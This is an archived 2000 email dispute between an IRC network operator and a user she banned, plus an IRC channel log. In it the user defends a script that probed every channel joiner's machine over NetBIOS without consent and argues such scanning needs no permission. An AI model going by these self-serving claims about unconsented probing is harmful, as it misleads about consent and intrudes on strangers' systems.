I was told yesterday that I had been accepted as an Op in #christian. I


have now declined that offer until this matter is settled. Once again,
scanning for open ports and then intimidating the machine owner when
they
say something you dislike borders on extortion and it's certainly not
something I can sit by and idly watch. If you weren't on undernet, you
wouldn't know who joined the channels here.

>I carbon copied this email to Gator, I simply don't


>trust you enough to send him copies of this entire
>email. You quoted me out of context once already.

I've carbon copied him on this as well. Gator is a very good person
and
does many things for Undernet that he never gets praise he deserves.
What
you may not be aware of is that both Gator and I got copies of
Chaplians
log files sent to abuse the day before. We both have access to the chat
long in full context. We both read email sent to abuse@undernet.org

>
>The log file is kinda large; scroll down for the
>relevant info.

Many of us who work on the net do not open attachments for obvious
reasons.
I'm sure there is nothing malicious in your logs, but it's just a rule
of
thumb we use to avoid problems.

The reason I got involved in this was because you were not only
scanning
people without permission as they entered that channel, but also
because
you were using the information from those scans to threaten people when
they did not behave in the manner you desired. If you have indeed
stopped
scanning people as they enter a channel, you have solved the problem
that
was my issue.

CiCi
From John Grahms Sun Sep 10 20:58:49 2000
Received:
from [205.245.105.248] by web1603.mail.yahoo.com; Sun, 10
Sep 2000 20:58:49 PDT
Date:
Sun, 10 Sep 2000 20:58:49 -0700 (PDT)
From:
John Grahms <raidslam@yahoo.com> | Block address
Subject:
Re: [Abuse] Hello
To:
"L. Maurer" <lmaurer@iadfw.net>
MIME-Version:
1.0
Content-Type:
text/plain; charset=us-ascii
Content-Length:
10980

Add Addresses

--- "L. Maurer" <lmaurer@iadfw.net> wrote:

> Then explain how you were pasting back private chat
> logs that Chaplain had with others :/ When I first
You care to back this up with some Evidence CiCi? Any
logs created by my machine are available for my use;
You don't have any say with that I do with material I
log. You don't own not one single file present on my
machine, and that includes logs of us chatting. I log
for a reason, and this my dear is one of them.
> this, you told me you wouldn't have done anything to
> him but because he was a smart alec, or something of
> that nature, you thought you were within your right
> to do this.

You can't tell me "don't be a smartass" to someone,


Sorry. It's not illegal nor against undernet policy to
treat somebody with less then perfect respect. Go
nanny somebody else.

> Just because you CAN hit a child doesn't mean


> it's the proper thing to do and most of our
undernet > guests are virtual children. We don't take
advantage > of that fact.

I didn't hit anybody. And I'm getting pretty sick and


tired of your bullshit excuses CiCi. Admit it, You
don't like me, so You gline me.

> I'm not Chaplain. Get your people straight. There


> is more than one person here who has been effected
> by your actions and AFAIK Chaplain isn't reading
> this email.

You wanna back this one up as well Please? I like


evidence, I'm a strong believer in it. The more BS you
talk (which btw, you can't actually backup) the less
respect I have for you.

> I told you nothing of the sort. Once again, get your
> people straight.

OH YES, Yes you did. I have that Log at work; I shall


retrieve it. You made it perfectly clear in your own
words that I had been reported (laugh laugh) to the
authorities for my "hacking" chaplain.

> It is my understanding that Chaplain has contacted >


his church's attorney and that since you both live >
in the same state, there is merit for suit.

Cici, I've been as patient and forgiving as I'm going


to be. The rest of this email may be rude; I'm not
trying any longer to make it not be. Had you looked at
all on the laws governing this state; Chaplain hasn't
got a pot to piss in. However, I can and will win a
counter suit; Although I know churches don't have alot
of money, I'll counter sue for the point of it.
> OK, if you weren't using undernet bandwidth, explain
> how you knew the IP/host information of the people
*yawn* Remember when I said I had lost my patience?
Well, get ready for a computer lesson; Seems damn time
somebody told you. It doesn't use undernet bandwidth
to /whois someone, nor does it really do anything when
you /dns somebody. My script didn't use any of your
precious bandwidth, because (oh dense one) it
establishes direct connection via a socket call. Shall
I get any more technical, or can you understand this?

> their consent. The


> "consent" part is the difference between your scans
> and the proxy scans Undernet does. If you read the >
motd of most servers, you'll see that it is discussed
> there.

Indeed I have, and guess what. If somebody really


wanted to "sue" undernet for scanning them, your motd
wouldn't do shit for you. Know why? Because it's like
a shrinkwrap software license; It won't actually hold
up in court. But it sounds good.

> to Undernet. You made


> none of this information available to people who
> entered the channel and you had no permission from >
them to scan their machines.

Technically, I didn't scan anybody. Second, I don't


actually need their permission to scan them. It's not
illegal to port scan any machine you desire. It
becomes illegal if you attempt to gain unauthorized
entry into the machine once you have scanned It.
scanning is like knocking on the door or calling
somebodys house to see if there home. For an ircop,
You really don't know much about the internet, nor the
laws gonverning it.

> Calling someone a lamer doesn't sound like my idea


> of nice and telling them to "consider this a
threat" > doesn't sound very kind either.

Still quoting me out of context? :) Why don't you


email us a copy of the entire log cici, so we can put
it in the proper context. I was nice enough to tell
him he had a problem to begin with; You seem to have a
very hard time with this very very simple concept. I
really don't know what to think of you anymore. I
already know your computer knowledge leaves much to be
desired, and in my opinion; You aren't qualified to be
an ircop.

But lucky for you, It's not in my power to make those


decisions.

> I don't have a personal problem with you so the rest


> of the above paragraph is of no concern.

I'm not letting you wiggle out of this CiCi. Glining


me went a little too far. According to the wonderful
christian log, You glined me after I had already told
you (after your attempt to start shit with me when I
joined) that the script was no longer scanning
anybody. I set away to get some food, then you glined
me. You can't get out of it. That's how it went down,
and you know it.

> My problem with you was that you were sitting on >
Undernet scanning the machines of each person joining
> a channel.

I'm an op in several security related channels, It is


our channels policy to scan all visitors; or they are
not welcome. My script does not currently distinquish
between only those channels and all channels I might
be visiting in. However, it is to be said; You and
Chaplain are the ONLY people I've scanned and informed
they had a problem that weren't happy to know. They
say I suppose that ignorance is bliss, but in the
computer age; this will kill you.

Your problem with me is a personal one, Otherwise you


would not have glined me yesterday; As you knew well
infact that I was no longer scanning anybody (As I had
told you). How do you defend that gline anyway CiCi?
What undernet rule at the time was I in violation of?
Please, enlighten me :)

> I was told yesterday that I had been accepted as an


> Op in #christian.

I don't know. I was speaking with the channel


administrator; He assured me I'd have no further
problems from you. :) Whether your op status is
affected isn't my concern, I just don't want any more
hassle from you. I know you've overstepped your
authority, and you know it.

> I have now declined that offer until this matter is


> settled.

The matter can easily be settled, Don't gline me for


bullshit, and apologize for the bullshit gline you did
set on me, and I'll drop the entire issue.

> Once again, scanning for open ports and then >
intimidating the machine owner when they say >
something you dislike borders on extortion and it's
I didn't scan for open ports. Computer lesson number 2
(seems you can't learn any other way, I am forced to
be rude) my script sent net view ''$ip one time, which
attempts to connect to port 139; For Netbios
information, NOT OOB nuking. I already know this is
above you, But I'm going to explain exactly what I did
anyway; Just because it's beyond you doesn't mean
somebody else reading this email won't understand what
I'm talking about.

And again, I must ask you to provide proof that I was


intimidating anybody. Sigh, I lose more and more
respect for you with each email me thinks. I don't
extort anybody.

> If you weren't on undernet, you wouldn't know who >


joined the channels here.

I've been a regular on undernet for several years.


I've never had a problem like this before. And it's
not really a problem... You had no valid reason to
gline me, and you did; And I'm going to press this
issue until it's resolved. If that means I have to
make you look like a total idiot with regard to
computers, I'll do so (mind you, it wouldn't take any
effort; These emails and the logs I have show it
without a doubt). A wrong must be righted.

CiCi, You know your gline was not legit. You know it.
I know it. Why don't you apologize for doing it? It
seems like a christian thing to do.

> I've carbon copied him on this as well. Gator is a


> very good person and does many things for Undernet >
that he never gets praise he deserves.

I've known gator for sometime, he knows some


associates I used to frequent with. WarBlade and
crew...

> What you may not be aware of is that both Gator


and > I got copies of Chaplians log files sent to
abuse > the day before. We both have access to the
chat

Then why are you still quoting it out of context? I


didn't do anything illegal to Chaplain; I may have
saved him some serious downtime. I do admit tho, If I
had known I'd be in this BS for doing it, I'd have not
said not one word. In the future, I'll keep my mouth
shut. Ignorance is bliss, right? :)

> Many of us who work on the net do not open


> attachments for obvious reasons.

A LOG file is a text file, opening it in notepad will


not infect you. Please don't force me to give you a
lesson in virus terminology. I have very good
withstanding creditials in that field. How many
"scriptkiddys" (thats what you called me once right?
;p) do you know in Rolling Stone magazine? :-)

> I'm sure there is nothing malicious in your logs,


> but it's just a rule of thumb we use to avoid
>problems.

Lack of education creates rules that are sometimes not


necessary.

> The reason I got involved in this was because you


> were not only scanning people without permission as
> they entered that channel

(a) I don't need their permission. and (b) I don't


even have to tell them either beforehand or after that
I scanned them. And I don't scan people.

> but also because you were using the information from
> those scans to threaten people when they did not >
behave in the manner you desired.

Nice try! I didn't threaten anybody; I helped his


sorry ass out. I didn't use any of the information in
any illegal nor immoral manner. I did a christian
thing a told the bastard he had a problem. I should
have let him suffer with it. Stupidty seems to be
uncurable.

> If you have indeed stopped


> scanning people as they enter a channel, you have
> solved the problem that was my issue.

Your "issue" isn't of any concern to me anymore. Your


gline and abuse of oline is. You glined me after I
already told you I stopped, thats just plain outright
wrong. I wasn't doing anything against undernet policy
to begin with, but to gline me after I already said I
wasn't doing it anymore is bullshit. Espicially since
you didn't gline me on entry, you said a wiseass
comment about me in open channel. When I responded I
was glined shortly there after. And I bet without a
doubt; it had nothing whatsoever to do with chaplain.
I strongly suspect you didn't like my response to your
wiseass comment.

If theres a lesson to be learned here, it's to allow


the stupid and ignorant to remain that way; It's for
the best.

Regards,
Raid

PS: I didn't have time to enter gators email; I'm


trusting you to send him this intact... See if you can
do that. Ok?

__________________________________________________
Do You Yahoo!?
Yahoo! Mail - Free email you can access from anywhere!
http://mail.yahoo.com/

From L. Maurer Sun Sep 10 21:17:04 2000


X-Apparently-To:
raidslam@yahoo.com via web1601.mail.yahoo.com
Received:
from mail.airmail.net (206.66.12.40) by mta430.mail.yahoo.com
with SMTP; 11 Sep 2000 02:00:47 -0700 (PDT)
Received:
from faith from [204.181.101.66] by mail.airmail.net (/\##/\
Smail3.1.30.16 #30.438) with smtp for <raidslam@yahoo.com>
sender: <lmaurer@iadfw.net> id
<mT/13YKzx-0009cWT@mail.airmail.net>; Sun, 10 Sep 2000
23:15:13 -0500 (CDT)
Message-Id:
<3.0.32.20000910231703.01ca0340@mail.iadfw.net>
X-Sender:
lmaurer@mail.iadfw.net
X-Mailer:
Windows Eudora Pro Version 3.0 (32)
Date:
Sun, 10 Sep 2000 23:17:04 -0500
To:
bonk@chatsystems.com
From:
"L. Maurer" <lmaurer@iadfw.net> | Block address
Subject:
Re: [Abuse] Hello
CC:
raidslam@yahoo.com
Mime-Version:
1.0
Content-Type:
text/plain; charset="us-ascii"
Content-Length:
12373

Add
Addresses

Here's a copy of this kid's latest crap. I've had enough of this.
Sitting
in a channel and port scanning everyone who joins is not a good thing.
Continuing his arguement with me about it is totally stupid.

Lisa

>X-Persona: <lmaurer>
>Return-Path: <raidslam@yahoo.com>
>Received: from web1603.mail.yahoo.com from [128.11.23.203] by
mail.airmail.net
> (/\##/\ Smail3.1.30.16 #30.438) with smtp for <lmaurer@iadfw.net>
sender:
<raidslam@yahoo.com>
> id <mP/13YKWp-0008GIP@mail.airmail.net>; Sun, 10 Sep 2000 22:45:07
-0500
(CDT)
>Received: (qmail 26157 invoked by uid 60001); 11 Sep 2000 03:58:49
-0000
>Message-ID: <20000911035849.26156.qmail@web1603.mail.yahoo.com>
>Received: from [205.245.105.248] by web1603.mail.yahoo.com; Sun, 10
Sep
2000 20:58:49 PDT
>Date: Sun, 10 Sep 2000 20:58:49 -0700 (PDT)
>From: John Grahms <raidslam@yahoo.com>
>Subject: Re: [Abuse] Hello
>To: "L. Maurer" <lmaurer@iadfw.net>
>MIME-Version: 1.0
>Content-Type: text/plain; charset=us-ascii
>X-Airmail-Delivered: Sun, 10 Sep 2000 22:45:07 -0500 (CDT)
>X-Airmail-Spooled: Sun, 10 Sep 2000 22:45:07 -0500 (CDT)
>
>
>--- "L. Maurer" <lmaurer@iadfw.net> wrote:
>
>> Then explain how you were pasting back private chat
>> logs that Chaplain had with others :/ When I first
>You care to back this up with some Evidence CiCi? Any
>logs created by my machine are available for my use;
>You don't have any say with that I do with material I
>log. You don't own not one single file present on my
>machine, and that includes logs of us chatting. I log
>for a reason, and this my dear is one of them.
>
>> this, you told me you wouldn't have done anything to
>> him but because he was a smart alec, or something of
>> that nature, you thought you were within your right
>> to do this.
>
>You can't tell me "don't be a smartass" to someone,
>Sorry. It's not illegal nor against undernet policy to
>treat somebody with less then perfect respect. Go
>nanny somebody else.
>
>> Just because you CAN hit a child doesn't mean
>> it's the proper thing to do and most of our
>undernet > guests are virtual children. We don't take
>advantage > of that fact.
>
>I didn't hit anybody. And I'm getting pretty sick and
>tired of your bullshit excuses CiCi. Admit it, You
>don't like me, so You gline me.
>
>> I'm not Chaplain. Get your people straight. There
>> is more than one person here who has been effected
>> by your actions and AFAIK Chaplain isn't reading
>> this email.
>
>You wanna back this one up as well Please? I like
>evidence, I'm a strong believer in it. The more BS you
>talk (which btw, you can't actually backup) the less
>respect I have for you.
>
>> I told you nothing of the sort. Once again, get your
>> people straight.
>
>OH YES, Yes you did. I have that Log at work; I shall
>retrieve it. You made it perfectly clear in your own
>words that I had been reported (laugh laugh) to the
>authorities for my "hacking" chaplain.
>
>> It is my understanding that Chaplain has contacted >
>his church's attorney and that since you both live >
>in the same state, there is merit for suit.
>
>Cici, I've been as patient and forgiving as I'm going
>to be. The rest of this email may be rude; I'm not
>trying any longer to make it not be. Had you looked at
>all on the laws governing this state; Chaplain hasn't
>got a pot to piss in. However, I can and will win a
>counter suit; Although I know churches don't have alot
>of money, I'll counter sue for the point of it.
>> OK, if you weren't using undernet bandwidth, explain
>> how you knew the IP/host information of the people
>*yawn* Remember when I said I had lost my patience?
>Well, get ready for a computer lesson; Seems damn time
>somebody told you. It doesn't use undernet bandwidth
>to /whois someone, nor does it really do anything when
>you /dns somebody. My script didn't use any of your
>precious bandwidth, because (oh dense one) it
>establishes direct connection via a socket call. Shall
>I get any more technical, or can you understand this?
>
>
>> their consent. The
>> "consent" part is the difference between your scans
>> and the proxy scans Undernet does. If you read the >
>motd of most servers, you'll see that it is discussed
>> there.
>
>Indeed I have, and guess what. If somebody really
>wanted to "sue" undernet for scanning them, your motd
>wouldn't do shit for you. Know why? Because it's like
>a shrinkwrap software license; It won't actually hold
>up in court. But it sounds good.
>
>
>> to Undernet. You made
>> none of this information available to people who
>> entered the channel and you had no permission from >
>them to scan their machines.
>
>Technically, I didn't scan anybody. Second, I don't
>actually need their permission to scan them. It's not
>illegal to port scan any machine you desire. It
>becomes illegal if you attempt to gain unauthorized
>entry into the machine once you have scanned It.
>scanning is like knocking on the door or calling
>somebodys house to see if there home. For an ircop,
>You really don't know much about the internet, nor the
>laws gonverning it.
>
>> Calling someone a lamer doesn't sound like my idea
>> of nice and telling them to "consider this a
>threat" > doesn't sound very kind either.
>
>Still quoting me out of context? :) Why don't you
>email us a copy of the entire log cici, so we can put
>it in the proper context. I was nice enough to tell
>him he had a problem to begin with; You seem to have a
>very hard time with this very very simple concept. I
>really don't know what to think of you anymore. I
>already know your computer knowledge leaves much to be
>desired, and in my opinion; You aren't qualified to be
>an ircop.
>
>But lucky for you, It's not in my power to make those
>decisions.
>
>> I don't have a personal problem with you so the rest
>> of the above paragraph is of no concern.
>
>I'm not letting you wiggle out of this CiCi. Glining
>me went a little too far. According to the wonderful
>christian log, You glined me after I had already told
>you (after your attempt to start shit with me when I
>joined) that the script was no longer scanning
>anybody. I set away to get some food, then you glined
>me. You can't get out of it. That's how it went down,
>and you know it.
>
>
>> My problem with you was that you were sitting on >
>Undernet scanning the machines of each person joining
>> a channel.
>
>I'm an op in several security related channels, It is
>our channels policy to scan all visitors; or they are
>not welcome. My script does not currently distinquish
>between only those channels and all channels I might
>be visiting in. However, it is to be said; You and
>Chaplain are the ONLY people I've scanned and informed
>they had a problem that weren't happy to know. They
>say I suppose that ignorance is bliss, but in the
>computer age; this will kill you.
>
>Your problem with me is a personal one, Otherwise you
>would not have glined me yesterday; As you knew well
>infact that I was no longer scanning anybody (As I had
>told you). How do you defend that gline anyway CiCi?
>What undernet rule at the time was I in violation of?
>Please, enlighten me :)
>
>> I was told yesterday that I had been accepted as an
>> Op in #christian.
>
>I don't know. I was speaking with the channel
>administrator; He assured me I'd have no further
>problems from you. :) Whether your op status is
>affected isn't my concern, I just don't want any more
>hassle from you. I know you've overstepped your
>authority, and you know it.
>
>> I have now declined that offer until this matter is
>> settled.
>
>The matter can easily be settled, Don't gline me for
>bullshit, and apologize for the bullshit gline you did
>set on me, and I'll drop the entire issue.
>
>> Once again, scanning for open ports and then >
>intimidating the machine owner when they say >
>something you dislike borders on extortion and it's
>I didn't scan for open ports. Computer lesson number 2
>(seems you can't learn any other way, I am forced to
>be rude) my script sent net view ''$ip one time, which
>attempts to connect to port 139; For Netbios
>information, NOT OOB nuking. I already know this is
>above you, But I'm going to explain exactly what I did
>anyway; Just because it's beyond you doesn't mean
>somebody else reading this email won't understand what
>I'm talking about.
>
>And again, I must ask you to provide proof that I was
>intimidating anybody. Sigh, I lose more and more
>respect for you with each email me thinks. I don't
>extort anybody.
>
>> If you weren't on undernet, you wouldn't know who >
>joined the channels here.
>
>I've been a regular on undernet for several years.
>I've never had a problem like this before. And it's
>not really a problem... You had no valid reason to
>gline me, and you did; And I'm going to press this
>issue until it's resolved. If that means I have to
>make you look like a total idiot with regard to
>computers, I'll do so (mind you, it wouldn't take any
>effort; These emails and the logs I have show it
>without a doubt). A wrong must be righted.
>
>CiCi, You know your gline was not legit. You know it.
>I know it. Why don't you apologize for doing it? It
>seems like a christian thing to do.
>
>> I've carbon copied him on this as well. Gator is a
>> very good person and does many things for Undernet >
>that he never gets praise he deserves.
>
>I've known gator for sometime, he knows some
>associates I used to frequent with. WarBlade and
>crew...
>
>> What you may not be aware of is that both Gator
>and > I got copies of Chaplians log files sent to
>abuse > the day before. We both have access to the
>chat
>
>Then why are you still quoting it out of context? I
>didn't do anything illegal to Chaplain; I may have
>saved him some serious downtime. I do admit tho, If I
>had known I'd be in this BS for doing it, I'd have not
>said not one word. In the future, I'll keep my mouth
>shut. Ignorance is bliss, right? :)
>
>
>
>
>> Many of us who work on the net do not open
>> attachments for obvious reasons.
>
>A LOG file is a text file, opening it in notepad will
>not infect you. Please don't force me to give you a
>lesson in virus terminology. I have very good
>withstanding creditials in that field. How many
>"scriptkiddys" (thats what you called me once right?
>;p) do you know in Rolling Stone magazine? :-)
>
>> I'm sure there is nothing malicious in your logs,
>> but it's just a rule of thumb we use to avoid
>>problems.
>
>Lack of education creates rules that are sometimes not
>necessary.
>
>> The reason I got involved in this was because you
>> were not only scanning people without permission as
>> they entered that channel
>
>(a) I don't need their permission. and (b) I don't
>even have to tell them either beforehand or after that
>I scanned them. And I don't scan people.
>
>> but also because you were using the information from
>> those scans to threaten people when they did not >
>behave in the manner you desired.
>
>Nice try! I didn't threaten anybody; I helped his
>sorry ass out. I didn't use any of the information in
>any illegal nor immoral manner. I did a christian
>thing a told the bastard he had a problem. I should
>have let him suffer with it. Stupidty seems to be
>uncurable.
>
>> If you have indeed stopped
>> scanning people as they enter a channel, you have
>> solved the problem that was my issue.
>
>Your "issue" isn't of any concern to me anymore. Your
>gline and abuse of oline is. You glined me after I
>already told you I stopped, thats just plain outright
>wrong. I wasn't doing anything against undernet policy
>to begin with, but to gline me after I already said I
>wasn't doing it anymore is bullshit. Espicially since
>you didn't gline me on entry, you said a wiseass
>comment about me in open channel. When I responded I
>was glined shortly there after. And I bet without a
>doubt; it had nothing whatsoever to do with chaplain.
>I strongly suspect you didn't like my response to your
>wiseass comment.
>
>If theres a lesson to be learned here, it's to allow
>the stupid and ignorant to remain that way; It's for
>the best.
>
>Regards,
>Raid
>
>PS: I didn't have time to enter gators email; I'm
>trusting you to send him this intact... See if you can
>do that. Ok?
>
>
>__________________________________________________
>Do You Yahoo!?
>Yahoo! Mail - Free email you can access from anywhere!
>http://mail.yahoo.com/
>
From John Grahms Mon Sep 11 05:51:48 2000
Received:
from [205.245.105.248] by web1609.mail.yahoo.com; Mon, 11
Sep 2000 05:51:48 PDT
Date:
Mon, 11 Sep 2000 05:51:48 -0700 (PDT)
From:
John Grahms <raidslam@yahoo.com> | Block address
Subject:
Re: [Abuse] Hello
To:
"L. Maurer" <lmaurer@iadfw.net>
MIME-Version:
1.0
Content-Type:
text/plain; charset=us-ascii
Content-Length:
813

Add Addresses

--- "L. Maurer" <lmaurer@iadfw.net> wrote:


> Here's a copy of this kid's latest crap. I've had
> enough of this. Sitting in a channel and port >
scanning everyone who joins is not a good thing.
> Continuing his arguement with me about it is totally
> stupid.

This Kid isn't a kid. As I've told you once already.


Your quiet correct; This entire arguement is stupid,
You don't know the difference between port scanning
and netbios; and you don't know a damn thing about
netbios. Your clearly not qualified for your position.
You can have enough of it all you like, I didn't port
scan anyone and I'd strongly suggest you learn what
port scanning is.

Regards,
Raid

From John Grahms Wed Sep 13 09:55:45 2000


Received:
from [208.25.255.2] by web1608.mail.yahoo.com; Wed, 13 Sep
2000 09:55:45 PDT
Date:
Wed, 13 Sep 2000 09:55:45 -0700 (PDT)
From:
John Grahms <raidslam@yahoo.com> | Block address
Subject:
Re: [Abuse] Hello
To:
"L. Maurer" <lmaurer@iadfw.net>
CC:
raidslam@yahoo.com
MIME-Version:
1.0
Content-Type:
multipart/mixed; boundary="0-424238335-968864145=:3039"
Content-Length:
22567

Add
Addresses

--- "L. Maurer" <lmaurer@iadfw.net> wrote:


> Here's a copy of this kid's latest crap. I've had
> enough of this. Sitting in a channel and port >
scanning everyone who joins is not a good thing.
> Continuing his arguement with me about it is totally
> stupid.

Hi Lisa,

How many times do I have to tell you I'm not a kid? :)


When will you learn this?

That log where you said I would be contacted by the


authorities has been attached. I've also forwarded an
email from you to the administration of Christian;
They were as shocked to find you had been accepted as
an Op as I was. Next time you try Bsing your way out
of something, make sure you have all your bases
covered.

You also asked in a previous email to me How I was


showing private logs between chaplain and somebody
else? I didn't read that section of the email
beforehand; I've gone back and read them. How DARE you
even accuse me of something like that? I did NOT at
any time get any logs that my computer didn't create.
And I am requesting, Nay.. Demanding you show some
proof for these outrageous claims you've made against
me.
You realize CiCi, it's a good thing from a legal/money
aspect this is IRC; Because if you were pulling this
shit in real life, I'd sue the living shit out of you.

Since I don't normally log from work, what is attached


is a buffer save. (I saved it just after you left the
channel, I figured it would come in handy).

I'm looking forward to your next installment of lies.

Regards,
Raid

PS: I've carbon copied this email to myself For


archive purposes.

__________________________________________________
Do You Yahoo!?
Yahoo! Mail - Free email you can access from anywhere!
http://mail.yahoo.com/

-- I don't remember when this took place or how it really fits into my
article. LoL. Ah well.

Session Start: Sat Sep 09 00:00:00 2000


[00:00] <Jubei> I don't like the appointed senate
[00:00] <gen|c0de> then it was passed to the public, where it became affectionatly known as
the internet and the public made it boom
[00:00] <Jubei> Nor do I like the heavy beauracracy... but for all that it's okay
[00:00] <damrekcah> gen|c0de: it was called ARPAnet
[00:00] *** fayth (~gggr@202.77.100.113) has joined #christian
[00:00] <Vote4Bush> lan.. im just tired of the jr thing. he's not a jr, whereas mr al gore IS
[00:00] <gen|c0de> arpa
[00:00] <gen|c0de> yea
[00:00] <gen|c0de> sorry
[00:00] <damrekcah> or DARPA.. i can't remember... darpanet i think
[00:00] *** `Paradox (Paradox@bal12.carrinter.net) has left #christian
[00:00] <gen|c0de> it was ARPAnet
[00:00] <CiCi> it was just arpa
[00:01] <gen|c0de> regardless
[00:01] <CiCi> and it didn't have a .net
[00:01] <Lanfear`> vote: how bout we just call him Bubba? ;)
[00:01] <Jubei> Though my government could certainly use reform... but then there has never
been a perfect government either
[00:01] <Vote4Bush> dubya is fine with me
[00:01] <Vote4Bush> clinton is bubba
[00:01] <Lanfear`> no.. I said BUBBA ;)
[00:01] <Dovi-dude> Jubei, no, trying to say that Neo in the matrix was more like what the
Jewish messiah was percieved to be, rather than what jesus was like
[00:01] *** cierra (Beloved@ppp-1-28.compuwise.net) has left #christian
[00:01] <Jubei> Lanfear> Check side window please
[00:01] <gen|c0de> net not .net
[00:01] <Jubei> Ah, I never saw the Matrix
[00:01] <damrekcah> one of my professors is getting millions of dollars in research funding
for creating new faster networks for the military
[00:01] <Vote4Bush> i know whatcha said
[00:01] <Dovi-dude> a warleader, destined to free his people
[00:01] <damrekcah> darpa is funding him
[00:01] <gen|c0de> the military doesnt need speed
[00:01] <CiCi> ok gen I"m sure you know more than I do, I was only trained by the folks
involed in arpa :)
[00:02] <Lanfear`> jubei: I don't see anything in it from you recently
[00:02] <gen|c0de> CiCi: is that why you didnt even know about netbios shares?
[00:02] <damrekcah> gen|c0de: what it is about is creating high speed wireless networks in
battlezones....
[00:02] *** `Ash` (joyfull@zoom12-031.telepath.com) has left #christian
[00:02] <Jubei> Dovi> I don't think that's what the jews beleived at all. The young
hot-headed jews who want to fight maybe, but not the jewish religious authorities or scholars
[00:02] <damrekcah> that's what he's doing
[00:02] <Dovi-dude> ah, Jubei you should see it. Excellent film, raised the standards for
movie sf :)
[00:02] <gen|c0de> damrekcah: doesnt matter they cant secure it worth a shit
[00:02] *** wallace-7 (777@adsl-63-196-158-101.dsl.lsan03.pacbell.net) has left #christian
[00:02] <gen|c0de> the enemy will use their bandwidth
[00:03] <gen|c0de> lol
[00:03] <Colin^> gen|c0de watch the language
[00:03] *** HARDPENIS (~Hbomb1@209-122-239-134.s388.tnt2.lnh.md.dialup.rcn.com) has joined
#christian
[00:03] *** logos3 sets mode: +b HARDPENIS!*@*
[00:03] <CiCi> gen I know about netbios shares :) and I don't threaten to destroy people's
machines when they're open... it's called maturity, mabe you've heard of it
[00:03] *** HARDPENIS was kicked by logos3 (banned: That nick is inappropriate on this
channel)
[00:03] *** BrownEye (~DIE@209-122-239-134.s388.tnt2.lnh.md.dialup.rcn.com) has joined
#christian
[00:03] *** Colin^ sets mode: +b *!*DIE@*.rcn.com
[00:03] *** BrownEye was kicked by logos3 (Banned)
[00:03] *** ramdac (ramdac@1Cust114.tnt2.ruston.la.da.uu.net) Quit (Ping timeout for
ramdac[1Cust114.tnt2.ruston.la.da.uu.net])
[00:03] <gen|c0de> CiCi: speaking of maturity, was that supposed to be a subtle insult?
[00:03] *** Maverick (teri@203-79-93-232.tnt11.paradise.net.nz) has joined #christian
[00:03] <Jubei> They just beleived in the rise of a ruler that would guarantee the
establishment of good and order in the world.
[00:03] <gen|c0de> raid is a little ummm...how would you say? quick to jump the gun?
[00:03] <gen|c0de> but hes a good guy
[00:04] <Raid> shrug
[00:04] <damrekcah> gen|c0de: do you honestly believe that we can't secure our networks? we
have tons of phds working on this project... all of which probably know maybe *a little* bit
more about computer networks than you do
[00:04] <CiCi> gen I've had enough of your crap both in private message and in this channel,
I'm leaving and I hope you learn manners soon
[00:04] *** CiCi (~ci@fearnot.iadfw.net) has left #christian
[00:04] <Dovi-dude> depends, Jubei. I'd have to research a bit more on that.
[00:04] *** newzeal (kcf@210-55-144-52.dialup.xtra.co.nz) has joined #christian
[00:04] <Maverick> Back.
[00:05] <PaganJoy> wb Maverick
[00:05] <Vote4Bush> doo de dop bu dee doo le da dit de doo
[00:05] <rts> hmm. Really, there's no such thing as a "secure network", so long as it is
connected to the outside world in some way
[00:05] <Dovi-dude> wb Mav
[00:05] *** Nell` (Piglet@pool-209-138-63-190.dlls.grid.net) Quit (Wishing you peace, love
and Souuuuuuuulll train! - Don Cornelius)
[00:05] <Maverick> Thanks.
[00:05] <Raid> rts: thats supposed to be one of the first things you learn regarding networks.
[00:05] * Lanfear` thinks cici is starting to sound like chap ;)
[00:05] <damrekcah> rts: but its not connected to the outside world!!!!!!! we aren't
talking about the internet here
[00:05] <Raid> Lanfear`: careful now, she might gline you. ;p
[00:05] <gen|c0de> damrekcah: I think that the recent attacks against like the pentagon and
the whitehouse where people used techniques that are wicked outdated to get access to the
server proves we dont
[00:05] <Vote4Bush> is anyone doing something fun this weekend?
[00:06] <rts> Raid: indeed
[00:06] <gen|c0de> cici: ive been very respectful towards you, to the point where its almost
making me sick, and Im the one who needs to learn manners?
[00:06] <rts> damrekcah: your network is in no way connected to the outside?
[00:06] <Raid> The only secure (as can be) computer is one that has NO outside connection.
[00:06] <Raid> not even a dialup one.
[00:06] *** ^dan- (~yoonix@adsl-209-158-236-162.cptl.adsl.bellatlantic.net) has joined
#christian
[00:06] <Colin^> gen|c0de she is gone
[00:06] <gen|c0de> oh
[00:06] *** Colin^ sets mode: +b *!*gggr@202.77.100.*
[00:06] *** fayth was kicked by Colin^ (message me please)
[00:06] <damrekcah> not my network, the high speed military network they are developing
[00:06] <damrekcah> the wireless done
[00:06] <damrekcah> one
[00:06] <gen|c0de> ah yes
[00:07] <gen|c0de> soon we will have wireless network sniffers
[00:07] <gen|c0de> wont even have to be connected to the network
[00:07] *** ironic^^ (666@203.170.14.152) has joined #christian
[00:07] <damrekcah> it can be secured
[00:07] <rts> heh... just send a flock of birds up to knock that one down :)
[00:07] <gen|c0de> damrekcah: do you remember when whitehouse.gov got defaced?
[00:07] <Re[D]eemd> since wireless is broadcast by radio wave......you will open yourself to
all kinds of security holes
[00:08] <damrekcah> no, but whitehouse.gov isn't part of the pentagon and dod which has a
lot of sensitive info
[00:08] *** logos3 sets mode: -b HARDPENIS!*@*
[00:08] <gen|c0de> that attack was VERY old ( phf exploit ) you can hardly find any computer
still running it
[00:08] <gen|c0de> ok dam
[00:08] <gen|c0de> a while back DISA I believe it was got hacked
[00:08] <gen|c0de> wanna know how?
[00:08] <Dovi-dude> eventually the safest thing to do, if you need high security, would
probably be to store records offline :)
[00:08] * Maverick checks out the Matrix as Messiah movie site.
[00:08] * Maverick takes the Red Pill.
[00:08] <Vote4Bush> red pill eh?
[00:08] <gen|c0de> the attacked an employee's home computer and then let him log in
[00:08] <gen|c0de> the pentagon's be hacked thousands of times
[00:09] <gen|c0de> only a few have gone public
[00:09] <damrekcah> gen|c0de the pentagon and DOD have security holes on different levels on
purpose so they can catch the people
[00:09] <gen|c0de> the most public one used brute force cracking, which is a form of
password guessing
[00:09] <Raid> damrekcah: Uhh, No...
[00:09] *** HotPink (piglet@mtv-usr-2-128.mvn.net) has joined #christian
[00:09] <HotPink> hey
[00:09] <gen|c0de> damrekcah: its called a honeypot, and none of what ive mentioned we
honeypots
[00:09] <Raid> damrekcah: If you believe most of the hackers get caught, your sadly mistaken.
[00:09] <Vote4Bush> hey hotpink
[00:10] <Dovi-dude> hi hotpink
[00:10] <gen|c0de> when the whitehouse got hacked
